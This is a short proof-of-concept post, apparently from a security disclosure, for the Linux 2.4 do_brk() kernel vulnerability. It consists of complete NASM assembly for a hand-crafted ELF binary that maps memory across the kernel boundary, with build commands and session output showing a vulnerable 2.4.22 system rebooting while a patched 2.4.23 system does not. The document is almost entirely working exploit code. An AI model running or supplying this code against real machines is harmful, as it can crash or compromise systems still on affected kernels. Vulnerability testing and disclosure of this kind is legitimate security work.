brk_poc.asm

`  
  
The following program can be used to test if a x86 Linux system  
is vulnerable to the do_brk() exploit; use at your own risk.  
  
$ nasm brk_poc.asm -o a.out  
$ chmod 755 a.out  
  
$ uname -a  
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux  
$ ./a.out &  
[1] 1698  
$ cat /proc/`pidof a.out`/maps  
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out  
c0000000-c0003000 rwxp 00000000 00:00 0  
  
(system reboots when the program exits)  
  
$ uname -a  
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux  
$ ./a.out &  
[1] 1591  
$ cat /proc/`pidof a.out`/maps  
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out  
  
(the program exits gracefully)  
  
$ cat brk_poc.asm  
  
; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html  
  
BITS 32  
  
org 0xBFFFF000  
  
ehdr: ; Elf32_Ehdr  
db 0x7F, "ELF", 1, 1, 1 ; e_ident  
times 9 db 0  
dw 2 ; e_type  
dw 3 ; e_machine  
dd 1 ; e_version  
dd _start ; e_entry  
dd phdr - $$ ; e_phoff  
dd 0 ; e_shoff  
dd 0 ; e_flags  
dw ehdrsize ; e_ehsize  
dw phdrsize ; e_phentsize  
dw 1 ; e_phnum  
dw 0 ; e_shentsize  
dw 0 ; e_shnum  
dw 0 ; e_shstrndx  
  
ehdrsize equ $ - ehdr  
  
phdr: ; Elf32_Phdr  
dd 1 ; p_type  
dd 0 ; p_offset  
dd $$ ; p_vaddr  
dd $$ ; p_paddr  
dd filesize ; p_filesz  
dd 0x4000 ; p_memsz  
dd 7 ; p_flags  
dd 0x1000 ; p_align  
  
  
phdrsize equ $ - phdr  
  
_start:  
  
mov eax, 162  
mov ebx, timespec  
int 0x80  
  
mov eax, 1  
mov ebx, 0  
int 0x80  
  
timespec dd 20,0  
  
filesize equ $ - $$  
  
--   
Christophe Devine - http://www.cr0.net:8040/about/  
`